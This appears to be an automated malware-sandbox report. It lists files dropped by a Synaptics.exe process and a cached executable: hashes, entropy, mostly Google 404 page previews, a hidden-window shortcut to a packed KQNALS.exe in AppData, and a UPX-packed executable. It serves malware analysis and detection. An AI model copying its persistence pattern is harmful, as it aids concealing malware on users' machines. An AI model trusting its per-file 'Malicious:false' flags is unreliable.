                                                                                                                    SHA-256:FF503D313D82A6A118DE8752021A1D7CB6FF31DF7F321FE1919D11EEDB3CD7BA
                                                                                                                    SHA-512:F920495BEC3CABE584E46407EF3A2A1398568C99A0CFC1946B1411047D6FD7A38D85083F13A42CCC934150E856C83E40F03D19FD1D5F8BFE7133571E641E566D
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.272066606686693
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0DSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+c+pAZewRDK4mW
                                                                                                                    MD5:7FD9031073596093F157F84E63063BB7
                                                                                                                    SHA1:F1DD5BD5512CEA4A441D2B2E026C922A9B42ECF9
                                                                                                                    SHA-256:ADBCBAE3FBE08A2B4768EBA11938A284F94631E88F463DAC9AEF22A1A753934C
                                                                                                                    SHA-512:2982ACAE918828905DE48D13D167FA630B4B8FBB28526F764805CF78E5EDE53E32149680392D411931F614F3ECF94DE1DBCE39D17E6B9E0FA4CA8C2DF7419955
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.263538042301746
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0WSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+9+pAZewRDK4mW
                                                                                                                    MD5:8E02FD779C9C27DC5F68B5DED0E897EC
                                                                                                                    SHA1:D12B514B3A1C70E878293197EF5435C3761DC05E
                                                                                                                    SHA-256:B921ECE6D1984E910E58316496DCF897687C0FB763D4B1B0EB8D37E0CBE219B3
                                                                                                                    SHA-512:DB2C38BC669563CA333ACB3FA6FCD11139A68CB3B8B3C57E1BFFF03B7DBD2375917CEB5AC31B13630C1587B694D0004D70D017DC85ADBAC55DFDC5A6E876BCE1
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.260677429141939
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0ozbSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Jzb+pAZewRDK4mW
                                                                                                                    MD5:40CDB0D0271BF6D6B0C61E931134455D
                                                                                                                    SHA1:0C2EFFDB11ED9EAE5D616F73482ADAC8D71D41E5
                                                                                                                    SHA-256:DE1B24E8EC24A6CDFF5FD4050BCEF881A4894A349C1D66BD55A85D98871E617E
                                                                                                                    SHA-512:8D2A193D147A52181A7378833DD34061F048D5EB636F8393934A22DB4A488FD757FD6A2EECEBF95F16680A0AE7BFD9C8D1925D2A88B2E37DDB5468BCD6B35ACD
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.255887802298005
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0wl3SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+95+pAZewRDK4mW
                                                                                                                    MD5:320EDA039B56579C2C1254BF78B219EC
                                                                                                                    SHA1:064D10F6E60D37F0AD35CD57F5A22311B972817D
                                                                                                                    SHA-256:0CDFC880B62DAD8D0385F4D35A89AC9A64AD7CA163F5E61CC4C0BA17B18B4FB6
                                                                                                                    SHA-512:A5FD51A10EB2C65D3BD22662CE98559D43854F14C0CD741DB7AC0AB3CB986EEDFF2C7D8ABAC25C160DC3DD38B06F1180A13BF6887E06921A7F6E75F4D693D725
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.247594538160015
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0vISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+WI+pAZewRDK4mW
                                                                                                                    MD5:77E2E3180B695AB3C25FD0CAF3926B68
                                                                                                                    SHA1:85D82D825786F5B88263393A8894A7CC8C2FF2CE
                                                                                                                    SHA-256:D06112B4452F00085CEDF3EEAF116E076490A58EF6531BF064A567DF8B868010
                                                                                                                    SHA-512:B05FF311BC59800F43F25E4E7DADF3AE631F46E1CDB66B138CD665935EFFD20377C255F0E06477252B3B261212F908CC8D67FE92E64B430C7C36693E8773DCDB
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.264429145083978
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0JXTgSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+c8+pAZewRDK4mW
                                                                                                                    MD5:CF08D9A796A5776A89A778330A636DFE
                                                                                                                    SHA1:324805642983DB67145E8444975D427AF3B97AA9
                                                                                                                    SHA-256:8E40D443F2C99D4F4DC1A1BC9FC13FEF21492A6321B261FF15C3E47EC0E4172D
                                                                                                                    SHA-512:B741F876DF9994A9E346332B217FEA0349987F19637B9AB45791F2600389D3350593FF87FEF21BE786951586176A9814BEC0F788FE76C47E2D421326EE8A2475
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.244594523882006
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0hQSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+N+pAZewRDK4mW
                                                                                                                    MD5:6AAF43847898087536140BD52F424CE5
                                                                                                                    SHA1:7260EA4F814DAA79BCCC71F9E704091E9FEAEEAF
                                                                                                                    SHA-256:12142150EBBE53F55B3636C0D75873D02826C7B2D3934580EC22C5F23FCEE47C
                                                                                                                    SHA-512:1604CF9D2B4084D7DB4EAB99F3822AE1952ED7B0A43EBE4A393562FDEA52794EC2009D163299DDF35F48BAA5AB56069C7CCFD3E6C0CD98A91666618AC341DEDE
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.266411530117205
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0jMWSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+i+pAZewRDK4mW
                                                                                                                    MD5:C177F0108B6246F977CCEBA356C02E9A
                                                                                                                    SHA1:2CD0DECA135833D45BAC50179FE16B30DE0DAD8B
                                                                                                                    SHA-256:C880CBD26082774D9CBC71983FAC995E0DC040BD8A3B1A57AD55B139B01CC054
                                                                                                                    SHA-512:F4080F3879469B585FBA9F425501832BB1855C5C27FAA859792FF51327E2FF7202950CD64939ED0F9CDBEA125E32088DB4E32D6281772DB01AAE2F43806F0353
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.254565603229231
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0ZSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+++pAZewRDK4mW
                                                                                                                    MD5:72555E7ACB511F9D96AAD3B124EDFB7D
                                                                                                                    SHA1:D3ADE64CD2BBD2F78DDE30E69EBF7A2C183990CA
                                                                                                                    SHA-256:09BAA7374314C6397CB0B9725F4E43A199E228523B41317D42FF2BC2FC5832B8
                                                                                                                    SHA-512:85FD8ACE849C309B1C5B4A1C56E19BB1809F41BEF29B52C76595155AF16B1BAD7BC3E3BA2A61BA62962161AC127E74D0E82B46B8959FECC37479A7B8E6682A24
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.262777616952167
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0NrISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+YrI+pAZewRDK4mW
                                                                                                                    MD5:89E8B37F7EE5CAFBB4DF03FC6A711D48
                                                                                                                    SHA1:E64F42A747C806A1BEEAF3FAF3247243AD52E5E3
                                                                                                                    SHA-256:908F7DCCC6D87E8379EA38B1068492CBAEA210CB3ECF4BA6581C606637077D4B
                                                                                                                    SHA-512:5C5D656B467BC93CC206252EED1B7D3C7C6D4C8D944159141224FDA484FB020209AADC982792D50670E3E0942F441D1B1F115320A9DD6BFC68E3A3A9673A1E2C
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.264771841321134
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+003SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+B+pAZewRDK4mW
                                                                                                                    MD5:A60402D46A8858B9357E6F718E6212B0
                                                                                                                    SHA1:F0DBF63DA2B0A532D1F69C25FC4E8994F2849850
                                                                                                                    SHA-256:C260BEEA599C4FD2C62A949AABA9AC9FE0E667C5C2D7CABA80CADEB4893492FE
                                                                                                                    SHA-512:66436EBE4581992BABDB40D0735ABCF79E43EE68713E6DB7FA243983E664BD3054C1D7BB45BC847A3DA2E51E1CD887048578FBCDE490AA098020BE806B2D57B7
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.2651510233184045
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0xrSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+C+pAZewRDK4mW
                                                                                                                    MD5:08FEE30834F60B612BDA705C33D78530
                                                                                                                    SHA1:7E86E7D95248D49CD544CC1D6406D8506773C386
                                                                                                                    SHA-256:C68EECE2A680FAC83986C7C7F2BE29DE879E9DB981F0EDD1406259205DF95FDB
                                                                                                                    SHA-512:D535707EF94040FD93A0E7032FC43A5E718671134E320BCF586674C57BAFB8C33E3BF895A26C42D790EE839CB6B9F86571B0E725B474F3563505A8F634D42950
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:Microsoft Excel 2007+
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):18387
                                                                                                                    Entropy (8bit):7.523057953697544
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                                    MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                                    SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                                    SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                                    SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.26497472974088
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0IbSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Zb+pAZewRDK4mW
                                                                                                                    MD5:1E73768319BCC1EC6769A438BAA6FFE5
                                                                                                                    SHA1:2A28EC26DDFC57E79B2B8B9099826B6E9B69E21A
                                                                                                                    SHA-256:7A489463D008DC5BE894F6C5128D5C31D152890432E73A9AD4B2A46C825F0207
                                                                                                                    SHA-512:27F07EC58DF1328AC8BD4F39B842601A3596446B0E418C714CCC6FACEF073C42200C8C16BE78EA4352E098BFBE9D0BD10039958059F3CB148A08D0BB5B7C3F81
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.257005430454805
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0/SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+g+pAZewRDK4mW
                                                                                                                    MD5:8DC3EE8ED66863C254FA8B59402192C6
                                                                                                                    SHA1:F6F6108CB580ED15D06B8BDD977C29EAAB02B550
                                                                                                                    SHA-256:352BB13EAAA8D71624707F648A14D5810FDC9B037EB219BB01AEC5AFB16A7D44
                                                                                                                    SHA-512:8EB34FED6A6A89D732D50778832C50514C67BED21B6B02B80FDD52704EB6F6821510CC2640C67043958F30A53804DF3D013494A51D59D0D1F70BA179383C0C67
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.257453173012007
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0uISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+3I+pAZewRDK4mW
                                                                                                                    MD5:B55702CC953F5AFA2122761902A1EE38
                                                                                                                    SHA1:FD8DF8EE555697367D622B93DF767065E51EFC6B
                                                                                                                    SHA-256:A61ED81EFA0D189F7079442968D5BA0D11503568C99E32D1EDEB74CC0CF89808
                                                                                                                    SHA-512:A4CC8D1444AA78A3EE02B9F1ECA429C3D752255F4E56AE4EA9E43631E23BF91D7E49B6B67641AB3D1D62AD7CCC8A04AA58988901D27FB58EB8895463B4F264F2
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.263131917638512
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0PPSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+kP+pAZewRDK4mW
                                                                                                                    MD5:5D848EA9C383C79E44CC9F7B22F07365
                                                                                                                    SHA1:042FB689C6ECD4F02B67B3F3AA20B05D82669DEA
                                                                                                                    SHA-256:106A9A179DDB1D3F0B6D93CF119E0B1C72E2D71CEED29DE8F51FFBB254EDA993
                                                                                                                    SHA-512:298AE56C3C6627349BAFD4169FA51AF683E32D67FE6CB3EDBB730BF268C2D9242B604DCE8BC3E9963E9BD470D6FF690B8DE1CB65864D2FD155B27ECFF77132AC
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.269330250731869
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0K7SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Z+pAZewRDK4mW
                                                                                                                    MD5:91483FADA3DDB58AAF26ADBEDC98096C
                                                                                                                    SHA1:2DE127D9AAE2311CD947241284F0DD14A8B88126
                                                                                                                    SHA-256:E436D29A5742901C7BB0C28C838B2E0869DCC86B4DCB662500169B367EA19F56
                                                                                                                    SHA-512:36BCC0BD39D9B8EF570A9C7BDFF713D4B1287954DF0FB10F7E75E8465BED421C3C7FB02B28BAB039DFFC1945113BA5ACCC4AE1FA1005072FA2A4446CDE9D458C
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.263254814629512
                                                                                                                    Encrypted:false
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.264126837479052
                                                                                                                    Encrypted:false
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.269917372936508
                                                                                                                    Encrypted:false
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.263893385591117
                                                                                                                    Encrypted:false
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, ASCII text, with very long lines (1024), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1024
                                                                                                                    Entropy (8bit):5.243675193434302
                                                                                                                    Encrypted:false
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.273120353438499
                                                                                                                    Encrypted:false
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.25985960163905
                                                                                                                    Encrypted:false
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.260139820034753
                                                                                                                    Encrypted:false
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.263380267947828
                                                                                                                    Encrypted:false
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.253681541861885
                                                                                                                    Encrypted:false
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.2471439141334955
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0VSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+u+pAZewRDK4mW
                                                                                                                    MD5:18BE7CDA70BE14E61C4699CE2A77B86A
                                                                                                                    SHA1:E05A6F7D556992FD7573297A1B7378C85EF2E0FB
                                                                                                                    SHA-256:88BADBF84A5C7BEC99D6435866B101583AC367FA05F682A6C5713446005B960C
                                                                                                                    SHA-512:2E5F7B222E366A7BBE833C7B94A5F2875AF40505A39C52A9BBF85222FEA2C21EDB4322E7A6446EE0C1DC9CCB008B384F289D8A9DA12D39BB4D4A838D1B7738AD
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="zn-5rZ20nbdwv1KhB6Mixw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.259167163488277
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0BtVSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK++/+pAZewRDK4mW
                                                                                                                    MD5:7E2362FFA54B0CA826C8C8B7D48E71F9
                                                                                                                    SHA1:1CEB612700790C2A026BB6D997BDDE94598A9D2C
                                                                                                                    SHA-256:1DB39C4627CC5EFB9752659F4CCBB644843D4D82AC623CF4E79FE4CC5D1D1EBF
                                                                                                                    SHA-512:68DD0D78DEBB7909906D6E7400C4C4E17805008442928BCF8514F9BF48D443CF2A42974EB94C8427B148E2C94BD82DD3C506305507048C78E446933714CB9C85
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="6MTviuEI5Imgm1H1tTuOsQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):165
                                                                                                                    Entropy (8bit):1.3520167401771568
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:qs/FFyGff:qsyWf
                                                                                                                    MD5:5C22367453CA7CD5BD7CA96C4FD55742
                                                                                                                    SHA1:FC7428D064740B4E331D57098AF028AA26FBC1AE
                                                                                                                    SHA-256:F5D3D989BFAC7CF7187B3665F8CB75AF84FD749DBE245E454E2F9F1AC562E543
                                                                                                                    SHA-512:BE2C202040245F25CB24C7F7B44A69F0000A95984236C3AE671443C56A7E1AE05BD7ACED71979ADF1159490770A767D25F581E76540C9C653441558BAECC0C89
                                                                                                                    Malicious:false
                                                                                                                    Preview:.user ..t.i.n.a. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):32768
                                                                                                                    Entropy (8bit):3.746897789531007
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:192:QuY+pHkfpPr76TWiu0FPZK3rcd5kM7f+ihdCF3EiRcx+NSt0ckBCecUSaFUH:ZZpEhSTWi/ekfzaVNg0c4gU
                                                                                                                    MD5:7426F318A20A187D88A6EC88BBB53BAF
                                                                                                                    SHA1:4F2C80834F4B5C9FCF6F4B1D4BF82C9F7CCB92CA
                                                                                                                    SHA-256:9AF85C0291203D0F536AA3F4CB7D5FBD4554B331BF4254A6ECD99FE419217830
                                                                                                                    SHA-512:EC7BAA93D8E3ACC738883BAA5AEDF22137C26330179164C8FCE7D7F578C552119F58573D941B7BEFC4E6848C0ADEEF358B929A733867923EE31CD2717BE20B80
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\Users\user\Desktop\._cache_LWQDFZ.exe
                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Icon number=4, Archive, ctime=Mon Dec 30 09:25:13 2024, mtime=Mon Dec 30 09:25:13 2024, atime=Mon Dec 30 09:25:13 2024, length=914944, window=hide
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1802
                                                                                                                    Entropy (8bit):3.415370365583593
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:82pHSzPaZveCydAmwwG8UE2+s9T4Il9SjKm:8XzPO1rmwSGr9MIl0jK
                                                                                                                    MD5:096D98FC40C50B08C2D0844FE598E191
                                                                                                                    SHA1:DDF60CF34A497ED21C639AF981359E4001FE6701
                                                                                                                    SHA-256:1D504C1C4A275C2A9748D72AD119FF1116A6CFDB4BCCCBD6FCC794FC0B9DA07A
                                                                                                                    SHA-512:7DF3DE4A26967579D93752A0FBF6174B35EE30FBCBB1DCD9102E184E818DFD24560D6E2407EDAE2037A0603D83DCFB1FF53FEFD49B983A268BF9F1345A0FA7B9
                                                                                                                    Malicious:false
                                                                                                                    Preview:L..................F.@.. ........Z.......Z.......Z............................:..DG..Yr?.D..U..k0.&...&.......bBDj....)...Z..EP...Z......t...CFSF..1.....EWsG..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EWsG.Y$S..........................=...A.p.p.D.a.t.a...B.V.1......Y"S..Roaming.@......EWsG.Y"S..........................`...R.o.a.m.i.n.g.....V.1......Y&S..Windata.@......Y&S.Y&S....2)....................`;..W.i.n.d.a.t.a.....`.2......Y'S .KQNALS.exe..F......Y'S.Y'S....N)....................#.s.K.Q.N.A.L.S...e.x.e......._...............-.......^............=.......C:\Users\user\AppData\Roaming\Windata\KQNALS.exe..!.....\.....\.....\.....\.....\.W.i.n.d.a.t.a.\.K.Q.N.A.L.S...e.x.e.(.".C.:.\.U.s.e.r.s.\.t.i.n.a.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.W.i.n.d.a.t.a.\."...C.:.\.W.i.n.d.o.w.s.\.S.y.s.W.O.W.6.4.\.s.h.e.l.l.3.2...d.l.l.........%SystemRoot%\SysWOW64\shell32.dll..................................................................................................................
                                                                                                                    Process:C:\Users\user\Desktop\._cache_LWQDFZ.exe
                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):914944
                                                                                                                    Entropy (8bit):7.8688917212806055
                                                                                                                    Encrypted:false
